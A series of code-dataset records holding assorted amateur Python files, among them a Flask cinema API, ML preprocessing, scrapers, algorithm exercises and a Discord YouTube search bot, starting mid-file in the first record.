'msg': fields.String,\n 'date': fields.String(default=str(time.time())),\n 'data': fields.List(fields.Nested(cinemas_fields), default='')\n}\n\n\n\nclass CinemaResource(Resource):\n @marshal_with(result_fields)\n def get(self):\n parse = parser.parse_args()\n city = parse.get('city')\n district = parse.get('district')\n sort = parse.get('sort')\n limit_n = parse.get('limit')\n\n cinemas = []\n if limit_n:\n cinemas =Cinema.query.limit(limit_n)\n if sort == 1: # 按分数降序\n cinemas = Cinema.query.order_by(-Cinema.score)\n elif sort == -1: # 按分数升序\n cinemas = Cinema.query.order_by(Cinema.score)\n\n if city=='全部':\n cinemas = Cinema.query.all()\n else:\n cinemas = Cinema.query.filter(Cinema.city==city)\n\n if district:\n cinemas =Cinema.query.filter(Cinema.district==district)\n\n\n responseData={\n 'msg':'影院获取成功',\n 'data':cinemas\n }\n\n return responseData\n","sub_path":"app/apis/CinemaApi.py","file_name":"CinemaApi.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"377647518","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport re, ast\n\nwith open('requirements.txt') as f:\n\tinstall_requires = f.read().strip().split('\\n')\n\n# get version from __version__ variable in sensor_integration/__init__.py\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\nwith open('sensor_integration/__init__.py', 'rb') as f:\n\tversion = str(ast.literal_eval(_version_re.search(\n\t\tf.read().decode('utf-8')).group(1)))\n\nsetup(\n\tname='sensor_integration',\n\tversion=version,\n\tdescription='Conector designed ti integrate sensors into ERPNext',\n\tauthor='Marius Ignat',\n\tauthor_email='marius.ignat13@gmail.com',\n\tpackages=find_packages(),\n\tzip_safe=False,\n\tinclude_package_data=True,\n\tinstall_requires=install_requires\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"116845811","text":"# -*- coding: utf-8 -*-\n\"\"\"\n profiling.sampling\n ~~~~~~~~~~~~~~~~~~\n\"\"\"\nfrom __future__ import absolute_import\nimport os\nimport signal\nimport threading\n\nfrom .profiler import Profiler\n\n\n__all__ = ['SamplingProfiler']\n\n\nclass SignalThread(threading.Thread):\n\n def __init__(self, signum=signal.SIGALRM, interval=0.1):\n threading.Thread.__init__(self)\n self.signum = signum\n self.interval = interval\n self.pid = os.getpid()\n self.stopper = threading.Event()\n self.daemon = True\n\n def send_signal(self):\n try:\n os.kill(self.pid, self.signum)\n except AttributeError:\n pass\n\n def run(self):\n while not self.stopper.wait(self.interval):\n self.send_signal()\n\n def stop(self):\n self.stopper.set()\n\n\nclass SamplingProfiler(Profiler):\n\n signum = signal.SIGALRM\n\n def handle_signal(self, signum, frame):\n self._profile(frame, 'call', None)\n self._profile(frame, 'return', None)\n\n def start(self):\n self.prev_handler = signal.signal(self.signum, self.handle_signal)\n self.signal_thread = SignalThread(self.signum)\n self.signal_thread.start()\n\n def stop(self):\n signal.signal(signal.SIGALRM, self.prev_handler)\n self.signal_thread.stop()\n","sub_path":"profiling/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"110343643","text":"#!/usr/bin/env python3\n#%%\n\nimport glob\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\n\nnp.random.seed(0)\n\ndef centroid(arr):\n center = np.mean(arr, axis=0) \n return center\n\n#%%\n\nlig_dir = '../data/train_lig/*'\npro_dir = '../data/train_pro/*'\noutput_dir = '../data/train_x/'\n\nnum_atoms_lig = 8\nnum_atoms_pro = 16\nnum_pairs = 2\n\nlig_files_path = glob.glob(lig_dir)\npro_files_path = glob.glob(pro_dir)\n\nlig_files_path.sort()\npro_files_path.sort()\n\nnbrs_lig = NearestNeighbors(n_neighbors=num_atoms_lig, algorithm='ball_tree')\nnbrs_pro = NearestNeighbors(n_neighbors=num_atoms_pro, algorithm='ball_tree')\n\nfor lig_file in lig_files_path:\n lig_arr = np.loadtxt(lig_file, delimiter=',', dtype=np.float64, ndmin=2)\n lig_num = lig_file[-15:-11]\n lig_index = int(lig_num) - 1\n# print('Ligand no.:', lig_num)\n# print('Ligand array shape: {}'.format(lig_arr.shape))\n\n # Calculate centroid\n lig_arr1 = np.copy(lig_arr[:,:-1])\n lig_centroid = centroid(lig_arr1)\n# print('Centroid:\\n {}'.format(lig_centroid))\n \n lig_atoms = lig_arr.shape[0]\n if lig_atoms < num_atoms_lig:\n # Pad with zeros at the bottom\n lig_arr_fixed = np.pad(lig_arr, ((0,num_atoms_lig - lig_atoms),(0,0)), 'constant')\n# print('Padded:\\n{}\\n'.format(lig_arr_fixed))\n elif lig_atoms > num_atoms_lig:\n # Truncate n number of atoms closest to centroid\n # Ordered with atom nearest to centroid on top\n nbrs_lig.fit(lig_arr1)\n knn = nbrs_lig.kneighbors(lig_centroid.reshape(1,-1), return_distance=False)\n lig_arr_fixed = lig_arr[knn.flatten()]\n# print('Truncated:\\n{}\\n'.format(lig_arr_fixed))\n else:\n lig_arr_fixed = lig_arr\n# print('No padding:\\n{}\\n'.format(lig_arr_fixed))\n \n rand_list = []\n for i in range(num_pairs):\n if i == 0:\n pro_file = pro_files_path[lig_index]\n rand_list.append(lig_index)\n else:\n while True:\n rand = np.random.randint(0,3000)\n if rand in rand_list:\n continue\n else:\n pro_file = pro_files_path[rand]\n rand_list.append(rand)\n break\n \n pro_arr = np.loadtxt(pro_file, delimiter=',', dtype=np.float64, ndmin=2)\n pro_arr1 = np.copy(pro_arr[:,:-1])\n pro_num = pro_file[-15:-11]\n# print('Protein no.:', pro_num)\n# print('Protein array shape: {}'.format(pro_arr.shape))\n \n pro_atoms = pro_arr.shape[0]\n if pro_atoms < num_atoms_pro:\n # Pad with zeros at the top\n pro_arr_fixed = np.pad(pro_arr, ((num_atoms_pro - pro_atoms,0),(0,0)), 'constant')\n# print('Padded: {}'.format(pro_arr_fixed.shape))\n elif pro_atoms > num_atoms_pro:\n # Select n number of protein atoms closest to ligand centroid\n # Ordered with atom nearest to centroid on the bottom\n nbrs_pro.fit(pro_arr1)\n knn = nbrs_pro.kneighbors(lig_centroid.reshape(1,-1), return_distance=False)\n pro_arr_fixed = pro_arr[knn.flatten()][::-1]\n# print('Truncated: {}'.format(pro_arr_fixed.shape))\n else:\n pro_arr_fixed = pro_arr\n# print('No padding: {}'.format(pro_arr_fixed.shape))\n \n # Concatenate and save\n pro_lig = np.concatenate((pro_arr_fixed, lig_arr_fixed), axis=0)\n pro_lig_fname = output_dir + pro_num + '_' + lig_num\n np.save(pro_lig_fname, pro_lig)\n print(pro_lig_fname, pro_lig.shape)\n# print(pro_lig, '\\n')","sub_path":"e0267382_e0367779/code/train_preprocessing_binary.py","file_name":"train_preprocessing_binary.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64990106","text":"year = 2108 # встановити деякий рік\nmonth = 2 # встановити деякий місяць\nif month == 2:\n if year == True: # вкладений оператор if-else\n nDays = 29\n else:\n nDays = 28\nelif (month == 4) or (month == 6) or (month == 9) or (month == 11):\n nDays = 30\nelse:\n nDays = 31\nprint(\"Кількість днів у місяці:\", month)\nprint(\"nDays=\", nDays)","sub_path":"Lab2(11).py","file_name":"Lab2(11).py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"585042548","text":"# Objective: Display Forex exchange rates in a GUI.\n# USD to PKR Conversion tracker.\n\nfrom lxml import html\nimport requests\nfrom tkinter import * \n\n# Dollar Rate data fetch from: https://hamariweb.com/finance/forex/\npage = requests.get('https://hamariweb.com/finance/forex/')\ntree = html.fromstring(page.content)\n\nopen_market_buy = tree.xpath('//*[@id=\"dollar_rate_world\"]/tbody/tr[1]/td[3]/text()')\nopen_market_sell = tree.xpath('//*[@id=\"dollar_rate_world\"]/tbody/tr[1]/td[4]/text()')\ninter_bank_buy = tree.xpath('//*[@id=\"inter_bank_table\"]/tbody/tr[4]/td[3]/text()')\ninter_bank_sell = tree.xpath('//*[@id=\"inter_bank_table\"]/tbody/tr[4]/td[4]/text()')\n\n#date = tree.xpath('//*[@id=\"main-content\"]/div/div[1]/div/h1/small/text()')\n\n# Tkinter GUI\nroot = Tk()\nroot.title(\"Currency Tracker USD to PKR\")\n#root.geometry('{}x{}'.format(325, 225)) # Commented out to disable auto sizing\n\nl1 = Label(root, text = \"Currency Rates: USD to PKR\").grid(row=0, column = 1)\nl2 = Label(root, text = \"Inter Bank\").grid(row=1, column = 1)\nl3 = Label(root, text = \"Buying\").grid(row=2, column = 0)\nl4 = Label(root, text = \"Selling\").grid(row=2, column = 2)\nd1 = Label(root, text = inter_bank_buy).grid(row=3, column = 0) # DATA 1\nd2 = Label(root, text = inter_bank_sell).grid(row=3, column = 2) # DATA 2\nl5 = Label(root, text = \"Open Market\").grid(row=4, column = 1)\nl6 = Label(root, text = \"Buying\").grid(row=5, column = 0)\nl7 = Label(root, text = \"Selling\").grid(row=5, column = 2)\nd3 = Label(root, text = open_market_buy).grid(row=6, column = 0) # DATA 3\nd4 = Label(root, text = open_market_sell).grid(row=6, column = 2) # DATA 4\n\n# date_GUI = Label(root, text = date[0]).grid(row=7, column = 1)\n\nroot.mainloop()","sub_path":"tracker_main.py","file_name":"tracker_main.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"511400177","text":"import torch\nimport torch.nn as nn\n\nclass Net(nn.Module):\n def __init__(self, num_classes=1):\n super().__init__()\n self.features = nn.Sequential(\n # suppose img size is 32*32*3\n # layer1\n nn.Conv2d(3, 6, 5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, stride=2),\n # layer2\n nn.Conv2d(6, 16, 5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, stride=2),\n )\n self.avgpool = nn.AdaptiveAvgPool2d((6, 6))\n self.classifier = nn.Sequential(\n # layer6\n nn.Dropout(),\n nn.Linear(6*6*16, 256),\n nn.ReLU(inplace=True),\n # layer7\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(inplace=True),\n # layer8\n nn.Linear(256, num_classes),\n )\n \n def forward(self, x):\n x = self.features(x)\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.classifier(x)\n return x\n","sub_path":"nets/simplenet.py","file_name":"simplenet.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404408690","text":"from jd_comments import comment_file_path\r\nimport jieba\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nfrom wordcloud import WordCloud\r\n\r\n# 词云形状图片\r\nword_image = 'leaf.png'\r\n# 词云字体\r\nfont_path = 'C:\\Windows\\Fonts\\simsun.ttc'\r\n\r\ndef cut_word():\r\n with open(comment_file_path, encoding = 'utf-8') as file:\r\n comment_text = file.read()\r\n word_list = jieba.cut(comment_text, cut_all = True)\r\n wl = \" \".join(word_list)\r\n return wl\r\n\r\ndef creat_word_cloud():\r\n wc_mask = np.array(Image.open(word_image))\r\n wc = WordCloud(background_color = 'white', max_words = 1000,\r\n mask = wc_mask, scale = 4, max_font_size = 100,\r\n random_state = 42, font_path = font_path)\r\n\r\n wc.generate(cut_word())\r\n\r\n plt.imshow(wc, interpolation = 'bilinear')\r\n plt.axis('off')\r\n plt.figure()\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n creat_word_cloud()","sub_path":"京东商品爬虫/show_data.py","file_name":"show_data.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"614308968","text":"#!/usr/bin/env python\n# test for service QuotationAccountDao\nimport random\nfrom xueqiao.quotation.account.thriftapi.dao.ttypes import *\nfrom xueqiao.quotation.account.thriftapi.dao.constants import *\nfrom xueqiao.quotation.account.thriftapi.dao.client.QuotationAccountDaoStub import *\nfrom xueqiao.quotation.account.thriftapi.ttypes import *\n\nstub=QuotationAccountDaoStub()\n#using like stub.xxxfunc(routeKey=random.randint(0, 100000), timeout=3000, args...)\n#testing...\n\nreq_option = ReqContractRegisterRuleOption()\npage_option= IndexedPageOption()\n\nreq_option.platformEnv = QuotationPlatformEnv.SIM\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"1: all\")\nprint(page)\n\nreq_option.commodityIds=[10512,10438]\n\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"2: commodity ids\")\nprint(page)\n\npage_option.needTotalCount = True\npage_option.pageIndex = 0\npage_option.pageSize = 10\n\npage= stub.reqContractRegisterRule(routeKey=100, timeout= 2000, option=req_option, pageOption= page_option)\nprint(\"3: page option\")\nprint(page)\n","sub_path":"quotation_account_dao/py_clients/req_contract_register_rule.py","file_name":"req_contract_register_rule.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"615840540","text":"import requests\nimport json\nimport datetime\nimport codecs\nimport proxycheker\nimport configparser\n\n#get mmr function\ndef getmmr(playerid):\n urlid = 'http://api.opendota.com/api/players/' + str(playerid)\n reader = codecs.getreader(\"utf-8\")\n r = requests.get(urlid)\n parsed_string = json.loads(r.content)\n # print(parsed_string)\n mmr = {\"solo_mmr\": parsed_string['solo_competitive_rank'],\"group_mmr\": parsed_string['competitive_rank']}\n #print(mmr)\n playername = parsed_string['profile']['personaname']\n return (mmr,playername)\n #real_mmr = parsed_string['mmr_estimate']\n # solo_mmr = parsed_string['solo_competitive_rank']\n\n#get match function\ndef getlastmatch(playerid,matchlimit):\n urlid = 'http://api.opendota.com/api/players/'+str(playerid)+'/matches?limit='+str(matchlimit)\n reader = codecs.getreader(\"utf-8\")\n r = requests.get(urlid)\n parsed_string = json.loads(r.content)\n\n for i in range(matchlimit):\n match_id = parsed_string [i]['match_id']\n kda = {\"kills\": parsed_string[i]['kills'],\"deaths\": parsed_string[i]['deaths'],\"assists\": parsed_string[i]['assists']}\n if kda[\"deaths\"] != 0:\n kda_avg = round ((kda[\"kills\"] + kda[\"assists\"]) / kda[\"deaths\"],2)\n else:\n kda_avg = round ((kda[\"kills\"] + kda[\"assists\"]),2)\n yield (kda_avg, match_id)\n\n#get player hero stat\ndef getheroes(playerid,gamemode,proxyspisok):\n if gamemode == 2:\n filter_date = 180\n elif gamemode == 1:\n filter_date = 90\n url = 'http://api.opendota.com/api/players/' + str(playerid) + '/heroes?game_mode=' + str(gamemode) + '&date=' + str(filter_date)\n\n# proxy tyt\n r = requests.get(url,proxy[0])\n herostat_parsed = json.loads(r.content)\n\n # загрузка соответствия имен героев и айди\n json_data = open('heroes.json').read()\n datafromjson = json.loads(json_data)\n\n # топ 10 героев с наибольшим количством боев\n if gamemode == 2:\n print('Топовые герои на CM mode с винрейтом больше 50%')\n elif gamemode == 1:\n print('Топовые герои на AP mode с винрейтом больше 50%')\n\n print(\"--------------------\")\n for i in herostat_parsed:\n if i['games'] >=5 and (i['win']/(i['games']/100)) >= 50:\n #в каждом выполненом условии сопоставить имя героя и процент ви��рейта\n for g in datafromjson:\n if int(g['value']) == int(i['hero_id']):\n last_p = str(i['last_played'])\n last = int(last_p[last_p.find('14'):])\n print(g['caption']+' - '+str(round((i['win']/(i['games']/100)),2))+ '%'+ ' - Кол-во Побед: ' + str(i['win']) + ' Последняя игра: ' + str(datetime.datetime.fromtimestamp(last)))\n break\n # print('Облом')\n\n# hero_id = 105\n\n# # открытие базы героев\n# json_data = open('heroes.json').read()\n# datafromjson = json.loads(json_data)\n# # поиск соответствия имени героя и айди\n# i = 0\n# while i <= 110:\n# if datafromjson[i]['value'] == hero_id:\n# print(datafromjson[i]['caption'])\n# break\n# i+=1\n\n# берем проксю из фаила и проверяем через проксичекер, результат в список\n# если первый раз то ищем проксю\n# если не первый то записываем содержимое в настройку прокси\nconfig = configparser.ConfigParser()\nconfig.read('config.cfg')\nif int(config['FirstRun']['firstRun']) == 1:\n config.set('FirstRun', 'FirstRun', '0')\n file = open('psp.txt', 'r')\n # цикл ниже можно заменить таким генератором\n # proxyspisok = []\n # for i in file:\n # f = file.readline().rstrip().split(':')\n # proxyspisok.append(f)\n proxyspisok = [file.readline().rstrip().split(':') for x in file]\n proxy = proxycheker.checkproxy(proxyspisok)\n file.close()\n config.set('Proxy', 'ip', proxy[0])\n config.set('Proxy', 'port', proxy[1])\n with open('config.cfg', 'w') as configfile:\n config.write(configfile)\n\nelse:\n config.read('config.cfg')\n proxy = []\n proxy.append(config.get('Proxy', 'ip'))\n proxy.append(config.get('Proxy', 'port'))\n with open('config.cfg', 'w') as configfile:\n config.write(configfile)\n\nprint(proxy)\ngetheroes(118912127,2,proxy)","sub_path":"getDota2API.py","file_name":"getDota2API.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280918938","text":"\"\"\"\nPipeline for text processing implementation\n\"\"\"\n\nfrom pathlib import Path\nfrom typing import List\nfrom pymorphy2 import MorphAnalyzer\nfrom pymystem3 import Mystem\nfrom article import Article\nfrom constants import ASSETS_PATH\n\n\nclass EmptyDirectoryError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass InconsistentDatasetError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass UnknownDatasetError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass MorphologicalToken:\n \"\"\"\n Stores language params for each processed token\n \"\"\"\n def __init__(self, original_word, normalized_form):\n self.original_word = original_word\n self.normalized_form = normalized_form\n self.mystem_tags = ''\n self.pymorphy_tags = ''\n\n def __str__(self):\n return f\"{self.normalized_form}<{self.mystem_tags}>({self.pymorphy_tags})\"\n\n def public_method(self):\n pass\n\n\nclass CorpusManager:\n \"\"\"\n Works with articles and stores them\n \"\"\"\n def __init__(self, path_to_raw_txt_data: str):\n self.path_to_raw_txt_date = path_to_raw_txt_data\n self._storage = {}\n self._scan_dataset()\n\n def _scan_dataset(self):\n \"\"\"\n Register each dataset entry\n \"\"\"\n path = Path(self.path_to_raw_txt_date)\n for element in path.glob('*_raw.txt'):\n index = int(element.parts[-1].split('_')[0])\n self._storage[index] = Article(url=None, article_id=index)\n\n def get_articles(self):\n \"\"\"\n Returns storage params\n \"\"\"\n return self._storage\n\n def public_method(self):\n pass\n\n\nclass TextProcessingPipeline:\n \"\"\"\n Process articles from corpus manager\n \"\"\"\n def __init__(self, corpus_manager: CorpusManager):\n self.corpus_manager = corpus_manager\n self.text = ''\n\n def run(self):\n \"\"\"\n Runs pipeline process scenario\n \"\"\"\n for article in self.corpus_manager.get_articles().values():\n self.text = article.get_raw_text()\n tokens = self._process()\n article.save_processed(' '.join(map(str, tokens)))\n\n def _process(self) -> List[type(MorphologicalToken)]:\n \"\"\"\n Performs processing of each text\n \"\"\"\n mystem_analyser = Mystem()\n pymotphy_analyser = MorphAnalyzer()\n result = mystem_analyser.analyze(self.text)\n morph_tokens = []\n for element in result:\n if element.get('analysis'):\n morph_token = MorphologicalToken(element['text'], element['analysis'][0]['lex'])\n morph_token.mystem_tags = element['analysis'][0]['gr']\n morph_tokens.append(morph_token)\n for token in morph_tokens:\n token_pymorhy = pymotphy_analyser.parse(token.original_word)[0]\n token.pymorphy_tags = token_pymorhy.tag\n return morph_tokens\n\n def public_method(self):\n pass\n\n\ndef validate_dataset(path_to_validate):\n \"\"\"\n Validates folder with assets\n \"\"\"\n path = Path(path_to_validate)\n if not isinstance(path_to_validate, str):\n raise UnknownDatasetError\n if path.exists():\n if not path.is_dir():\n raise NotADirectoryError\n if not list(path.iterdir()):\n raise EmptyDirectoryError\n counter_raw = 0\n counter_meta = 0\n for element in path.iterdir():\n if str(element).endswith('_raw.txt'):\n counter_raw += 1\n if str(element).endswith('_meta.json'):\n counter_meta += 1\n if not counter_raw == counter_meta:\n raise InconsistentDatasetError\n else:\n raise FileNotFoundError\n\n\ndef main():\n print('Your code goes here')\n\n validate_dataset(ASSETS_PATH)\n corpus_manager = CorpusManager(ASSETS_PATH)\n pipeline = TextProcessingPipeline(corpus_manager)\n pipeline.run()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151414068","text":"'''\r\nCreated on Sep 4, 2016\r\n\r\n@author: sanjay\r\n\r\n@summary: Simple Binary Search Algorithm Program.\r\n\r\n@note: Binary search works only on Sorted List\r\n'''\r\n\r\ndef binary_search(a, x, lo=0, hi=None):\r\n if hi is None:\r\n hi = len(a)\r\n while lo < hi:\r\n mid = (lo+hi)//2\r\n midval = a[mid]\r\n if midval < x:\r\n lo = mid+1\r\n elif midval > x: \r\n hi = mid\r\n else:\r\n return mid\r\n return -1\r\n\r\n\r\ndata_list = list(range(30))\r\n\r\ndata = 2\r\n\r\npos = binary_search(data_list,data)\r\n\r\nif pos == -1:\r\n print(\"{} not found in the list\".format(data))\r\nelse:\r\n print(\"{} found at position {} \".format(data,pos))\r\n","sub_path":"Python_DS_Exercise/Searching/BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55438588","text":"'''\n@Description: \n@Version: 1.0\n@Autor: Henggao\n@Date: 2020-03-15 18:48:06\n@LastEditors: Henggao\n@LastEditTime: 2020-03-16 13:35:10\n'''\n\nfrom random import choice\n\n\nclass RandomWalk():\n ''' 一个生成随机漫步数据的类'''\n\n def __init__(self, num_points=5000):\n '''初始化随机漫步的属性'''\n self.num_points = num_points\n\n # 所有随机漫步都始于(0,0)\n self.x_values = [0]\n self.y_values = [0]\n\n def get_step(self):\n '''确定每次漫步的距离和方向,并计算这次漫步将如何移动'''\n direction = choice([1,-1])\n distance = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step\n\n def fill_walk(self):\n '''计算随机漫步包含的所有点'''\n\n # 不断漫步,知道列表达到指定的长度\n while len(self.x_values) < self.num_points:\n # 决定前进方向及沿这个方向前进的距离\n # x_direction = choice([1,-1])\n # x_distance = choice([0, 1, 2, 3, 4])\n # x_step = x_direction * x_distance\n x_step = self.get_step()\n\n # y_direction = choice([1,-1])\n # y_distance = choice([0, 1, 2, 3, 4])\n # y_step = y_direction * y_distance\n y_step = self.get_step()\n\n # 拒绝原地踏步\n if x_step == 0 and y_step == 0:\n continue\n\n # 计算下一个点的x和y值\n next_x = self.x_values[-1] + x_step\n next_y = self.y_values[-1] + y_step\n\n self.x_values.append(next_x)\n self.y_values.append(next_y)\n\n\n","sub_path":"Pythonvisual/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387873799","text":"# python3\r\nimport sys\r\n\r\ndef BWT(text):\r\n bwt_matrix = []\r\n for i in range(len(text)):\r\n prefix, suffix = text[i:], text[:i]\r\n bwt_matrix.append(prefix + suffix)\r\n l = [b[-1] for b in sorted(bwt_matrix)]\r\n result = ''\r\n for i in l:\r\n result += i\r\n return result\r\n\r\nif __name__ == '__main__':\r\n text = sys.stdin.readline().strip()\r\n print(BWT(text))\r\n","sub_path":"Algorithms Specialization UCSD/string/pa02/bwt.py","file_name":"bwt.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253283662","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import when_mentioned_or\nimport aiohttp\nimport re\nimport asyncio\nfrom apiclient.discovery import build #youtube api\nimport sys\nimport time\nimport json\nfrom random import choice as randchoice\nimport git\nimport logging\nimport logging.handlers\nimport traceback\nimport datetime\nimport subprocess\n\n\ndescription = '''Youtube bot for Discord. Searches YouTube and responds with a link to a video.'''\n\nbot = commands.Bot(command_prefix=when_mentioned_or('yt '), description=description, shard_id=0, shard_count=3)\nsession = aiohttp.ClientSession(loop=bot.loop)\n\nsys.modules['win32file'] = None #Some systems will crash without this because Google's Python is built differently\nkey = ''\ncarbon_key = ''\ndbots_key = ''\n\n@bot.event\nasync def on_ready():\n global logger\n if not hasattr(bot, \"uptime\"):\n bot.uptime = int(time.perf_counter())\n logger.info(\"-- Logging in... --\")\n logger.info(\"Logged in as {}\".format(bot.user.name))\n logger.info(\"Shard ID: {}\".format(shard_id))\n logger.info(\"------\")\n await bot.change_presence(game=discord.Game(name='yt help'), status=discord.Status.dnd) # look at that fancy red-ness\n await bot.update()\n comm_count = 0\n\n@bot.event\nasync def update():\n\n payload = json.dumps({\n 'server_count': len(bot.servers)\n })\n\n headers = {\n 'authorization': dbots_key,\n 'content-type': 'application/json'\n }\n\n DISCORD_BOTS_API = 'https://bots.discord.pw/api'\n\n url = '{0}/bots/205224819883638785/stats'.format(DISCORD_BOTS_API)\n async with session.post(url, data=payload, headers=headers) as resp:\n logger.info('SERVER COUNT UPDATED.\\nDBots statistics returned {0.status} for {1}\\n'.format(resp, payload))\n\n CARBONITEX_API_BOTDATA = 'https://www.carbonitex.net/discord/data/botdata.php'\n carbon_payload = {\n 'key': carbon_key,\n 'servercount': len(bot.servers)\n }\n async with self.session.post(CARBONITEX_API_BOTDATA, data=carbon_payload) as resp:\n logger.info('Carbon statistics returned {0.status} for {1}'.format(resp, carbon_payload))\n\n@bot.event\nasync def on_server_join(server):\n await bot.update()\n\n@bot.event\nasync def on_server_leave(server):\n await bot.update()\n\ndef set_logger():\n global logger\n logger = logging.getLogger(\"discord\")\n logger.setLevel(logging.WARNING)\n handler = logging.FileHandler(\n filename='discord.log', encoding='utf-8', mode='a')\n handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s Discord: %(funcName)s %(lineno)d: '\n '%(message)s',\n datefmt=\"[%d/%m/%Y %H:%M]\"))\n logger.addHandler(handler)\n\n logger = logging.getLogger(\"yt\")\n logger.setLevel(logging.INFO)\n\n yt_format = logging.Formatter(\n '%(asctime)s %(levelname)s YouTube Code: %(funcName)s %(lineno)d: '\n '%(message)s',\n datefmt=\"[%d/%m/%Y %H:%M]\")\n\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(yt_format)\n stdout_handler.setLevel(logging.INFO)\n\n fhandler = logging.handlers.RotatingFileHandler(\n filename='yt.log', encoding='utf-8', mode='a',\n maxBytes=10**7, backupCount=5)\n fhandler.setFormatter(yt_format)\n\n logger.addHandler(fhandler)\n logger.addHandler(stdout_handler)\n\n@bot.event\nasync def on_command_error(error, ctx):\n if isinstance(error, commands.MissingRequiredArgument):\n await send_cmd_help(ctx)\n elif isinstance(error, commands.BadArgument):\n await send_cmd_help(ctx)\n elif isinstance(error, commands.CommandOnCooldown):\n await ctx.bot.send_message(ctx.message.channel, \"Woah there, {}. That command is on cooldown!\".format(ctx.message.author.mention))\n elif isinstance(error, commands.CommandInvokeError):\n logger.exception(\"Exception in command '{}'\".format(\n ctx.command.qualified_name), exc_info=error.original)\n oneliner = \"Error in command '{}' - {}: {}\".format(\n ctx.command.qualified_name, type(error.original).__name__,\n str(error.original))\n await ctx.bot.send_message(ctx.message.channel, oneliner)\n elif isinstance(error, commands.CommandNotFound):\n pass\n elif isinstance(error, commands.CheckFailure):\n pass\n else:\n logger.exception(type(error).__name__, exc_info=error)\n\n@bot.command(aliases=[\"dpy\"], pass_context=True, hidden=True)\nasync def updpy(ctx):\n if ctx.message.author.id == \"116079569349378049\":\n command = subprocess.Popen([\"pip3\", \"install\", \"-U\", \"git+https://github.com/Rapptz/discord.py@master#egg=discord.py[voice]\"], stdout=subprocess.PIPE)\n output = command.stdout.read().decode()\n await bot.say(\"```\" + output + \"```\")\n if \"Already up-to-date.\" not in output:\n await bot.say(\"Restarting now to apply changes...\")\n session.close()\n await bot.logout()\n\n\n@bot.command(aliases=[\"v\"])\n@commands.cooldown(1, 60, commands.BucketType.server)\nasync def version():\n \"\"\"Shows the changelog and version of the bot\"\"\"\n msg = \"```diff\\n\"\n msg += \"- YouTube\\n\\n\"\n #msg += \"CURRENTLY TESTING\\n\"\n msg += \"! Current Version: 1.6.1\"\n msg += \"\\n\\n\"\n msg += \"+ What's new?\\n\\n\"\n msg += \"! 1.6 - 1.6.1\\n--- Added reverse lookup of videos. `yt stats`.\\n--- Also, new help server! Whoop! https://discord.gg/yp8WpMh\\n\\n\"\n msg += \"! 1.5\\n--- Massive cleanup of code. More organised. Added cooldown warnings (available by typing `yt cooldowns`). Added logging. Errors should mostly be gone.\\n\\n\"\n msg += \"! 1.4.3\\n--- Added info command.\\n\\n\"\n msg += \"! 1.4\\n--- Channel Search\\n\\n+ Shows the title & sub count of the channel\\n+ Shows the description\\n+ Shows the thumbnail (or tries to!)\\n\\n\"\n msg += \"```\\n\"\n msg += \"View the full changelog here: \\n\"\n # msg += \"! 1.3.1 - 1.3.3\\n--- Added cooldowns to commands and cleaned up messy bits of code.\\n\\n\"\n # msg += \"! 1.3\\n--- Now Playing URL for Discord.FM\\n\\n\"\n # msg += \"! 1.2.1\\n--- Inital aesthetics changes. New randomised ping 